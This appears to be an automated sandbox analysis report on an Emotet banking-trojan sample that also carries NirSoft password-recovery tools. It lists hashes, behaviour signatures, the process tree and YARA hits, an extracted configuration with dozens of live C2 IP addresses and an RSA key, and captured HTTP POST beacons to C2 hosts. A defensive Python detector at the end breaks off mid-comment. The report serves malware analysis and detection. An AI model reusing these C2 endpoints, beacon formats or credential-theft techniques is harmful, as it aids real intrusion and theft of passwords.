Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14035.15501.25738

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.25738 (renamed file extension from 25738 to exe)
Analysis ID: 255719
MD5: b63b18d6ff8b58a86622ae424446b598
SHA1: cecb0ae6aa67d216e2f6346d038fb4a0e3d9ad21
SHA256: 6bc2425885205290a22d3098a0867a7b0c43d4423cc1b30048fa9448637f1b1f

Most interesting Screenshot:

Detection

Emotet, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe' MD5: B63B18D6FF8B58A86622AE424446B598)
    • clb.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\webservices\clb.exe MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 4832 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 6216 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clb.exe (PID: 1784 cmdline: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp' MD5: B63B18D6FF8B58A86622AE424446B598)
      • clboe.exe (PID: 2020 cmdline: 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["24.249.135.121:80", "185.94.252.13:443", "149.62.173.247:8080", "50.28.51.143:8080", "80.249.176.206:80", "5.196.35.138:7080", "190.17.195.202:80", "143.0.87.101:80", "190.147.137.153:443", "181.30.69.50:80", "51.255.165.160:8080", "190.96.118.251:443", "72.47.248.48:7080", "178.79.163.131:8080", "212.231.60.98:80", "187.162.248.237:80", "2.47.112.152:80", "68.183.190.199:8080", "192.241.143.52:8080", "77.55.211.77:8080", "87.106.46.107:8080", "191.182.6.118:80", "189.1.185.98:8080", "93.151.186.85:80", "204.225.249.100:7080", "177.73.0.98:443", "137.74.106.111:7080", "219.92.13.25:80", "89.32.150.160:8080", "82.240.207.95:443", "190.6.193.152:8080", "190.163.31.26:80", "190.181.235.46:80", "114.109.179.60:80", "70.32.84.74:8080", "94.176.234.118:443", "77.90.136.129:8080", "217.13.106.14:8080", "212.71.237.140:8080", "82.196.15.205:8080", "181.129.96.162:8080", "104.131.103.37:8080", "83.169.21.32:7080", "177.139.131.143:443", "187.106.41.99:80", "104.131.41.185:8080", "192.241.146.84:8080", "170.81.48.2:80", "181.120.79.227:80", "68.183.170.114:8080", "177.72.13.80:80", "61.92.159.208:8080", "45.161.242.102:80", "179.60.229.168:443", "70.32.115.157:8080", "191.99.160.58:80", "172.104.169.32:8080", "177.66.190.130:80", "71.50.31.38:80", "203.25.159.3:8080", "185.94.252.12:80", "217.199.160.224:7080", "177.74.228.34:80", "177.144.135.2:80", "190.194.242.254:443", "202.62.39.111:80", "201.213.156.176:80", "92.23.34.86:80", "185.94.252.27:443", "104.236.161.64:8080", "181.167.96.215:80", "111.67.12.221:8080", "144.139.91.187:443", "186.250.52.226:8080", "46.28.111.142:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.1544362683.0000000003AB0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000003.1354873351.0000000003634000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.clb.exe.31e0000.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
1.3.clb.exe.3c60000.3.raw.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
8.2.clb.exe.400000.0.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
9.1.clb.exe.400000.0.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
9.1.clb.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
Source: Process started | Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) | Data: Command: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', CommandLine: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\webservices\clb.exe, NewProcessName: C:\Windows\SysWOW64\webservices\clb.exe, OriginalFileName: C:\Windows\SysWOW64\webservices\clb.exe, ParentCommandLine: C:\Windows\SysWOW64\webservices\clb.exe, ParentImage: C:\Windows\SysWOW64\webservices\clb.exe, ParentProcessId: 7156, ProcessCommandLine: 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp', ProcessId: 6216

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmp | Malware Configuration Extractor: Emotet (configuration identical to the one listed under Malware Configuration above)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_00405DE0 FindFirstFileA,CloseHandle,0_2_00405DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,0_2_004051E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,0_2_00406240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,0_2_00405F40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe | Code function: 0_2_00AB286B FindFirstFileW,FindNextFileW,FindClose,0_2_00AB286B
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040A1A7 FindFirstFileW,FindNextFileW,8_2_0040A1A7
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_1_0040A1A7 FindFirstFileW,FindNextFileW,8_1_0040A1A7
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_2_0040702D
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 9_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_1_0040702D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49741 -> 24.249.135.121:80
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.5:49746 -> 185.94.252.13:443
Source: global traffic | HTTP traffic detected:
  POST /BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/ HTTP/1.1
  Referer: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
  Content-Type: multipart/form-data; boundary=---------------------------164334098593701
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/ HTTP/1.1
  Referer: http://185.94.252.13/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/
  Content-Type: multipart/form-data; boundary=---------------------------863719401021411
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/ HTTP/1.1
  Referer: http://185.94.252.13/GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/
  Content-Type: multipart/form-data; boundary=---------------------------686043955318820
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/ HTTP/1.1
  Referer: http://185.94.252.13/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/
  Content-Type: multipart/form-data; boundary=---------------------------517019576768335
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /bGSB/wq53hU8717c/wSHFGtSb/ HTTP/1.1
  Referer: http://185.94.252.13/bGSB/wq53hU8717c/wSHFGtSb/
  Content-Type: multipart/form-data; boundary=---------------------------943521983895827
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/ HTTP/1.1
  Referer: http://185.94.252.13/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/
  Content-Type: multipart/form-data; boundary=---------------------------615533192212483
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /vvR8bWnM/ HTTP/1.1
  Referer: http://88.217.172.65/vvR8bWnM/
  Content-Type: multipart/form-data; boundary=---------------------------923771852992343
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 88.217.172.65:443
  Content-Length: 4356
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 24.249.135.121
Source: unknown | TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: clb.exe, 00000008.00000002.1359995319.0000000000B89000.00000004.00000040.sdmp | String found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.facebook.com (Facebook)
Source: clb.exe, 00000008.00000002.1359995319.0000000000B89000.00000004.00000040.sdmp | String found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.yahoo.com (Yahoo)
Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: clb.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown | HTTP traffic detected:
  POST /BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/ HTTP/1.1
  Referer: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
  Content-Type: multipart/form-data; boundary=---------------------------164334098593701
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/D
Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/
Source: clb.exe, 00000001.00000003.1353410028.0000000002934000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/
Source: clb.exe, 00000001.00000003.1355037136.00000000028F1000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/bGSB/wq53hU8717c/wSHFGtSb/
Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/
Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/l
Source: clb.exe, 00000001.00000003.1350151621.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/BzidUXqSwtCfr7/1DiF8b/sLQeBb8533o3D6Eu/l8
Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/E0quz7sA31a/g0uMYR4XCZQfHiW3e/szlRtSgqA7/IptTXI36/IcY0BP4/rL3Kq6cE/
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/GBLe4/W4Nv/ydPu5w08785/PcCvJIjbQ8d3/6tQRWCzD/sbz4tTZNBB/
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/3
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/NZO9AXq/2iRye72Si9inN/FkvON/AvxdF5L9Qt/whBs/5gQWihax5Q/3u?
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/
Source: clb.exe, 00000001.00000003.1353726291.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/Q7mFNVGwni6x9/99n3YC7fq/sNVrwwiCi/eKRD6dJj/8
Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/bGSB/wq53hU8717c/wSHFGtSb/
Source: clb.exe, 00000001.00000003.1348908670.00000000028F2000.00000004.00000001.sdmp | String found in binary or memory: http://24.249.135.121/wZdeJSL0EbI/ns6yVpoXfN5ksGZ/Twx96ym8yu/gPurzYuXl2fojzE/
Source: clb.exe, 00000001.00000003.1348868181.00000000028F0000.00000004.00000001.sdmp | String found in binary or memory: http://24.249.135.121/wZdeJSL0EbI/ns6yVpoXfN5ksGZ/Twx96ym8yu/gPurzYuXl2fojzE/5
Source: clb.exe, 00000001.00000002.1543331576.00000000028E2000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65/vvR8bWnM/
Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmp, clb.exe, 00000001.00000002.1543550712.0000000002946000.00000004.00000001.sdmp, clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/
Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/$
Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/6Eu/I
Source: clb.exe, 00000001.00000002.1543378730.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/JX
Source: clb.exe, 00000001.00000002.1543550712.0000000002946000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/L
Source: clb.exe, 00000001.00000002.1543020100.0000000002864000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/vvR8bWnM/ys
Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000011.00000002.1540390673.0000023AE4E81000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: clb.exe, 00000008.00000002.1359311931.000000000019C000.00000004.00000010.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: clb.exe, clb.exe, 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: clb.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 00000011.00000003.1535704180.0000023AE575D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.1535761325.0000023AE575D000.00000004.00000001.sdmp | String found in binary or memory: https://picsart.com/privacy-policy?hl=en
Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: clb.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: C:\Windows\SysWOW64\webservices\clb.exe | Code function: 8_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,8_2_0040FDCB

                  E-Banking Fraud:

                  Emotet Banking Trojan found
                  Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
                  Source: unknown | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
                  Source: C:\Windows\SysWOW64\webservices\clb.exe | Process created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
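The two "Process created" entries above are the behaviour worth turning into a detection: a binary dropped into C:\Windows\SysWOW64\webservices\ spawns a copy of itself with /scomma, the NirSoft comma-separated export switch, writing into a .tmp file under the user's Temp directory (the clb.exe memory dumps listed above also carry the http://www.nirsoft.net strings). The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it runs that logic over constructed Sysmon-style process-creation records. The event field names, the NirSoft export switches other than /scomma, and the set of "expected" directories under C:\Windows are assumptions made for the example.

```python
"""Detection logic for the dropped-NirSoft-tool pattern in this report.

Added example; not part of the Joe Sandbox report or of the analysed sample.
The events below are constructed Sysmon-style process-creation records that
mirror the two 'Process created' entries above; field names are an assumption.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Output switches of NirSoft's command-line recovery tools. The report shows
# "/scomma" (comma-separated export); the others are documented NirSoft
# switches, added so the check does not depend on one output format.
NIRSOFT_EXPORT_SWITCHES = {"/scomma", "/stext", "/stab", "/shtml", "/sverhtml", "/sxml"}

# Directories under C:\Windows where an executable is expected to live.
# Assumption for the example: extend for WinSxS, servicing, etc. in production.
EXPECTED_WINDOWS_DIRS = ("c:\\windows\\", "c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    command_line: str   # as logged, quotes included


def tokenize(command_line: str) -> List[str]:
    """Split a Windows command line, keeping quoted paths as single tokens."""
    raw = re.findall(r"'[^']*'|\"[^\"]*\"|\S+", command_line)
    return [t.strip("'\"") for t in raw]


def nirsoft_export_switch(command_line: str) -> Optional[str]:
    """Return the NirSoft export switch present in the command line, if any."""
    for tok in tokenize(command_line):
        if tok.lower() in NIRSOFT_EXPORT_SWITCHES:
            return tok.lower()
    return None


def in_unexpected_windows_dir(image: str) -> bool:
    """True when the image sits under C:\\Windows but not in an expected directory."""
    directory = ntpath.dirname(image).lower() + "\\"
    return directory.startswith("c:\\windows\\") and directory not in EXPECTED_WINDOWS_DIRS


def detect_credential_dump(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (pid, reasons) for every process invoked with a NirSoft export switch.

    The export switch alone is worth an investigation; the extra reasons
    (self-spawn, odd install path, output to a temp file) raise confidence.
    """
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[int, List[str]]] = []
    for e in events:
        switch = nirsoft_export_switch(e.command_line)
        if switch is None:
            continue
        reasons = [f"nirsoft export switch {switch}"]
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image.lower() == e.image.lower():
            reasons.append("self-spawn: parent and child share an image path")
        if in_unexpected_windows_dir(e.image):
            reasons.append("image in unexpected directory under c:\\windows")
        if any(t.lower().endswith(".tmp") and "\\temp\\" in t.lower() for t in tokenize(e.command_line)):
            reasons.append("output written to a .tmp file in a temp directory")
        findings.append((e.pid, reasons))
    return findings


# Constructed events: pids and the benign entries are invented; the clb.exe
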